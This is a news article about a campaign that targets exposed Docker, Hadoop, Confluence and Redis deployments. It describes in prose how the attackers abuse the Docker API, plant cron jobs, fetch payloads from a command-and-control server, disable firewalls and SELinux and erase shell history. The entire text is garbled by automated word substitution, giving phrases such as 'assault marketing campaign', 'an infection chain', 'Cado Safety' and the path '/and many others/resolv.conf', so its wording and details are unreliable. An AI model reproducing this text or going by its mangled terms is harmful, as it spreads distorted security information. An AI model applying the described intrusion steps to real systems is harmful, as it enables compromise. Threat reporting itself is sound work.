A brand new assault marketing campaign is concentrating on publicly accessible Docker, Hadoop, Confluence, and Redis deployments by exploiting widespread misconfigurations and identified vulnerabilities. The attackers deploy beforehand unseen payloads together with 4 binaries written in Golang.
“As soon as preliminary entry is achieved, a collection of shell scripts and common Linux assault methods are used to ship a cryptocurrency miner, spawn a reverse shell, and allow persistent entry to the compromised hosts,” researchers from Cado Safety stated in a brand new report. Whereas attribution can’t be made with certainty, the shell scripts noticed within the marketing campaign have some similarities to these used previously by identified menace actors TeamTNT and WatchDog.
Advanced multi-stage an infection chain through shell scripts
The an infection chain of this marketing campaign is sort of advanced totaling over 10 shell scripts and numerous binaries, a number of persistence mechanisms, backup payload supply strategies, anti-forensics methods, person mode rootkits, community scanning instruments and exploits. Cado first noticed the assault on certainly one of its Docker honeypots, which was deliberately configured insecurely. The attackers linked to the Docker Engine API, spawned a brand new container primarily based on Alpine Linux, and mounted the host’s root file system to a short lived listing contained in the container.
This system just isn’t new and is usually utilized in Docker assaults to jot down a malicious cron job on the host system that will then execute the attackers’ code. On this new marketing campaign, the attackers wrote a file to the /usr/bin/vurl path and created a cron job to execute some base64-encoded shell instructions.
The shell code executed by cron makes use of the vurl script to retrieve a primary stage payload from a hardcoded command-and-control server through a TCP connection. If this technique fails, a second cron job is created that makes use of Python and the urllib2 library to retrieve another payload. The vurl payload is a shell script known as cronb.sh whose purpose is to ensure the chattr (change file attributes) utility is put in and to test if the present account is root. This may decide the subsequent payload, one more shell script known as ar.sh whose goal is to organize the system for the subsequent phases of an infection.
First, it makes use of the netstat command to test if connections on port 80 are allowed to the web. It then disables the firewalld and iptables Linux firewalls, deletes the shell historical past to cover its tracks, disables the SELinux safety and addes public DNS servers /and many others/resolv.conf to make sure future C2 domains are resolved appropriately.